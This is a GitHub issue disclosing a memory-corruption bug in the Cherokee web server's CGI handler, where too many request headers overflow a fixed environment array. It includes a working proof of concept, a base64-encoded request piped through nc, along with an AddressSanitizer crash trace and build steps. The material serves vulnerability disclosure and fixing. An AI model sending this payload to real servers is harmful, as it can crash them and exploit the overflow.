Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CGI Handler too many headers #1224

Open
mmmds opened this issue Jul 25, 2019 · 1 comment

Comments

@mmmds
Copy link

commented Jul 25, 2019

struct cherokee_handler_cgi_t (handler_cgi.h) consist of a fixed sized array (char *envp[ENV_VAR_NUM]) for environ variables. Sending a request with a lot of headers, causes to

increment int envp_last to a value greater than ENV_VAR_NUM resulting in reading outside the array.

handler_cgi.c:

310     cgi->envp[cgi->envp_last] = entry;
311     cgi->envp_last++;

PoC

echo -n 'R0VUIC90ZXN0MTAvdGVzdC5odG1sIEhUVFAvMS4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMTcwMTQxMTgzNDYwNDY5MjMxNzMxNjg3MzAzNzE1ODg0MTA1NzI3Ckhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDQyOTQ5NjcyOTUuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpVc2VyLUFnZW50OiBweXRob24KCgo=' | base64 -d | nc 127.0.0.1 80

ASAN

=================================================================
==10864==ERROR: AddressSanitizer: SEGV on unknown address 0x6180001cb3c0 (pc 0x55c74bfd2f94 bp 0x7f6bac2e6220 sp 0x7f6bac2e61f0 T7)
==10864==The signal is caused by a WRITE memory access.
    #0 0x55c74bfd2f93 in cherokee_handler_cgi_add_env_pair /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:310
    #1 0x55c74c02d6e4 in foreach_header_add_unknown_variable /home/mmm/fuzz/webserver/cherokee/handler_cgi_base.c:664
    #2 0x55c74c09fe32 in cherokee_header_foreach_unknown /home/mmm/fuzz/webserver/cherokee/header.c:1220
    #3 0x55c74c02db36 in cherokee_handler_cgi_base_build_envp /home/mmm/fuzz/webserver/cherokee/handler_cgi_base.c:696
    #4 0x55c74bfd30f3 in add_environment /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:328
    #5 0x55c74bfd6912 in fork_and_execute_cgi_via_spawner /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:787
    #6 0x55c74bfd35a8 in cherokee_handler_cgi_init /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:382
    #7 0x55c74c04b44c in cherokee_handler_init /home/mmm/fuzz/webserver/cherokee/handler.c:93
    #8 0x55c74c048233 in cherokee_connection_open_request /home/mmm/fuzz/webserver/cherokee/connection.c:2678
    #9 0x55c74bf84889 in process_active_connections /home/mmm/fuzz/webserver/cherokee/thread.c:1165
    #10 0x55c74bf8a549 in cherokee_thread_step_MULTI_THREAD /home/mmm/fuzz/webserver/cherokee/thread.c:2086
    #11 0x55c74bf7e300 in thread_routine /home/mmm/fuzz/webserver/cherokee/thread.c:99
    #12 0x7f6bb2b166da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
    #13 0x7f6bb263b88e in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x12188e)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:310 in cherokee_handler_cgi_add_env_pair
Thread T7 created by T0 here:
    #0 0x7f6bb2f9dd2f in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x37d2f)
    #1 0x55c74bf7f219 in cherokee_thread_new /home/mmm/fuzz/webserver/cherokee/thread.c:247
    #2 0x55c74bf6773f in initialize_server_threads /home/mmm/fuzz/webserver/cherokee/server.c:671
    #3 0x55c74bf69a05 in cherokee_server_initialize /home/mmm/fuzz/webserver/cherokee/server.c:1053
    #4 0x55c74bf0d76f in common_server_initialization /home/mmm/fuzz/webserver/cherokee/main_worker.c:255
    #5 0x55c74bf0e1f7 in main /home/mmm/fuzz/webserver/cherokee/main_worker.c:393
    #6 0x7f6bb253bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)

==10864==ABORTING

Setup:

  • Ubuntu 18.04 64 bit

  • source code from github, commit 9a75e65

  • build command:

ac_cv_func_realloc_0_nonnull=yes ac_cv_func_malloc_0_nonnull=yes LDFLAGS="-lasan" LDADD="-lasan" CFLAGS="-fsanitize=address -ggdb -O0 -fprofile-arcs -ftest-coverage" ./configure --prefix=`pwd`/bin --enable-trace --enable-static-module=all --enable-static --enable-shared=no
make
  • files in webroot mkdir /var/www/test{1..20}; for i in seq 1 20; do echo test > test$i/test.html; done
  • configuration file cherokee.txt

found by: Mateusz Kocielski, Michał Dardas from LogicalTrust

@skinkie skinkie self-assigned this Jul 25, 2019

@skinkie skinkie added the t:bug label Jul 25, 2019

@skinkie

This comment has been minimized.

Copy link
Member

commented Jul 25, 2019

We should investigate if we want to keep adding headers or quit before that.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
2 participants
You can’t perform that action at this time.